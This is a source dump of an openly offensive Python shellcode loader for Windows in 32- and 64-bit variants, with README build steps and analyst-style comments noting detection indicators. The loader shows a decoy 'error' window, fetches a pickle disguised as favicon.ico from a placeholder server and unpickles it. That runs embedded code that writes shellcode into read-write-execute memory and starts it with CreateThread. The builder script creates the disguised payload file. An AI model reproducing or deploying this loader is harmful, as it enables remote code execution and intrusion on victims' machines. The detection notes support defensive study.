├── x32 ├── README.md ├── loader.py └── pickle_to_img.py └── x64 ├── README.md ├── loader.py └── pickle_to_img.py /x32/README.md: -------------------------------------------------------------------------------- 1 | # Base64 your shellcode and put 2 | https://github.com/iloveflag/PythonShellcodeLoader/blob/main/x32/pickle_to_img.py#L18 3 | # Run pickle_to_img.py 4 | # Put "favicon.ico" to your webserver 5 | # Editor request url 6 | https://github.com/iloveflag/PythonShellcodeLoader/blob/main/x32/loader.py#L35 7 | # Pyinstaller -F loader.py -w 8 | # NOTICE 9 | must be win32 python 10 | 11 | myenv:win10+Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:21:23) [MSC v.1916 32 bit (Intel)] on win32 -------------------------------------------------------------------------------- /x64/README.md: -------------------------------------------------------------------------------- 1 | # Base64 your shellcode and put 2 | https://github.com/iloveflag/PythonShellcodeLoader/blob/main/x64/pickle_to_img.py#L6 3 | # Run pickle_to_img.py 4 | # Put "favicon.ico" to your webserver 5 | # Editor request url 6 | https://github.com/iloveflag/PythonShellcodeLoader/blob/main/x64/loader.py#L24 7 | # Pyinstaller -F loader.py -w 8 | # NOTICE 9 | myenv:win10+Python 3.9.12 (main, Apr 4 2022, 05:22:27) [MSC v.1916 64 bit (AMD64)] :: Anaconda, Inc. 
on win32 10 | x64 mybe not support in win7
--------------------------------------------------------------------------------
/x64/loader.py:
--------------------------------------------------------------------------------
# Stage-1 downloader. Shows a small Tk window, then fetches a file over plain
# HTTP and hands the response body to pickle.loads(). Unpickling calls whatever
# callable the byte stream names, so the server (or anyone able to alter the
# unencrypted response) decides what runs in this process.
import urllib.request
from tkinter import *


class Application(Frame):
    """Tk frame whose only content is a label reading 'error'."""

    def __init__(self, master=None):
        Frame.__init__(self, master)
        self.pack()
        self.createWidgets()

    def createWidgets(self):
        """Create and pack the single 'error' label."""
        self.helloLabel = Label(self, text='error')
        self.helloLabel.pack()


app = Application()

app.master.title('https://github.com/iloveflag/PythonShellcodeLoader')
# mainloop() blocks until the window is closed; everything below runs only
# after that. Analysis note: a dynamic-analysis run that never dismisses the
# window records no network or memory activity from this sample.
app.mainloop()

import pickle
# ctypes is not referenced by name in this file; the source text carried in
# the pickle imports it when it is exec'd.
import ctypes

# Despite the name, `shellcode` holds the raw HTTP response body, i.e. the
# pickle stream written by pickle_to_img.py, not machine code.
# Network indicators: a cleartext GET for /favicon.ico sent with urllib's
# default "Python-urllib/<version>" User-Agent, answered by a body that does
# not begin with the ICO header 00 00 01 00. A pickle of protocol 2 or later
# begins with the PROTO opcode 0x80, and this one carries the strings
# "builtins", "exec" and the stage-2 Python source in cleartext.
shellcode = urllib.request.urlopen("http://yourserver/favicon.ico").read()
# pickle.loads() on remote bytes is code execution by design: the stream from
# pickle_to_img.py reduces to exec(<source text>), which runs inside this
# process during the loads() call. The same call in legitimate code is the
# vulnerable pattern; an Unpickler whose find_class() is restricted to an
# allow-list refuses the builtins.exec global this stream depends on.
pickle.loads(shellcode)

--------------------------------------------------------------------------------
/x32/loader.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python
# -*-coding:utf-8 -*-

"""
# File: loader.py
# Time:2022/5/27 22:43
# Author:iloveflag@outlook.com
# version:Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:21:23) [MSC v.1916 32 bit (Intel)] on win32
# Github:https://github.com/iloveflag
"""

# Same statements as /x64/loader.py: decoy Tk window first, then an HTTP fetch
# whose body goes straight into pickle.loads().
import urllib.request
from tkinter import *


class Application(Frame):
    """Tk frame whose only content is a label reading 'error'."""

    def __init__(self, master=None):
        Frame.__init__(self, master)
        self.pack()
        self.createWidgets()

    def createWidgets(self):
        """Create and pack the single 'error' label."""
        self.helloLabel = Label(self, text='error')
        self.helloLabel.pack()


app = Application()

app.master.title('https://github.com/iloveflag/PythonShellcodeLoader')
# Blocks until the window is closed; the download below happens only afterwards.
app.mainloop()

import pickle
# Not referenced by name in this file; imported by the exec'd stage-2 source.
import ctypes

# `shellcode` is the HTTP response body (a pickle stream), fetched in cleartext
# with urllib's default User-Agent; the body is not an ICO image.
shellcode = urllib.request.urlopen("http://yourserver/favicon.ico").read()
# Unpickling this stream calls exec() on the Python source embedded in it.
pickle.loads(shellcode)

--------------------------------------------------------------------------------
/x64/pickle_to_img.py:
--------------------------------------------------------------------------------
# Builder for the file the loader downloads. It pickles an object whose
# __reduce__ names builtins.exec with the text below as its argument and writes
# the result to "favicon.ico". Nothing in the text runs here: pickle.dumps()
# only records the reference to exec and the string; exec is called on the
# host that unpickles the file.
import pickle
# Python source carried inside the pickle as a plain string. Read top to bottom
# it:
#   - base64-decodes the placeholder, then codecs.escape_decode() turns
#     backslash escapes in the decoded text into raw bytes;
#   - sets VirtualAlloc.restype to c_uint64, since ctypes' default c_int return
#     type would truncate a 64-bit address;
#   - calls VirtualAlloc(NULL, len, 0x3000, 0x40), i.e. MEM_COMMIT|MEM_RESERVE
#     with PAGE_EXECUTE_READWRITE;
#   - copies the bytes into that region with RtlMoveMemory;
#   - starts a thread at the region's address with CreateThread;
#   - waits on the thread handle with timeout -1 (INFINITE).
# Host telemetry this sequence produces: a private read-write-execute
# allocation in a Python (or PyInstaller-packed) process, followed by a thread
# whose start address is not backed by any image on disk.
shellcode = """
import base64
import ctypes
import codecs
shellcode= "***base64 your shellcode and put!***"
shellcode = base64.b64decode(shellcode)
shellcode = codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
"""


class A(object):
    """Carrier object: only the result of its __reduce__ ends up in the pickle."""

    def __reduce__(self):
        # pickle stores (callable, args); the unpickler calls callable(*args),
        # which here is exec(shellcode).
        return (exec, (shellcode,))


ret = pickle.dumps(A())
# The output is a pickle byte stream under an icon file name; its content does
# not match the ICO format, and the embedded source (API names included) is
# stored as readable text inside it.
with open("favicon.ico", 'wb') as img:
    img.write(ret)

--------------------------------------------------------------------------------
/x32/pickle_to_img.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python
# -*-coding:utf-8 -*-

"""
# File: pickle_to_img.py
# Time:2022/5/27 22:45
# Author:iloveflag@outlook.com
# version:Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:21:23) [MSC v.1916 32 bit (Intel)] on win32
# Github:https://github.com/iloveflag
"""

# 32-bit variant of the builder: pickles an object that reduces to
# exec(<text below>) and writes the stream to "favicon.ico". The text is not
# executed by this script, only serialized.
import pickle

# Embedded Python source. It performs the same sequence as the x64 variant
# (base64 decode, escape decode, VirtualAlloc with 0x3000 / 0x40 =
# MEM_COMMIT|MEM_RESERVE / PAGE_EXECUTE_READWRITE, RtlMoveMemory, CreateThread,
# WaitForSingleObject with timeout -1), but passes addresses as c_int and does
# not override VirtualAlloc.restype.
shellcode = """
import base64
import ctypes
import codecs
shellcode= "***base64 your shellcode and put!***"
shellcode = base64.b64decode(shellcode)
shellcode = codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
"""


class A(object):
    """Carrier object: only the result of its __reduce__ ends up in the pickle."""

    def __reduce__(self):
        # The unpickler calls exec(shellcode) when it rebuilds this object.
        return (exec, (shellcode,))


ret = pickle.dumps(A())
# Pickle stream written under an icon file name; the content is not an ICO image.
with open("favicon.ico", 'wb') as img:
    img.write(ret)

--------------------------------------------------------------------------------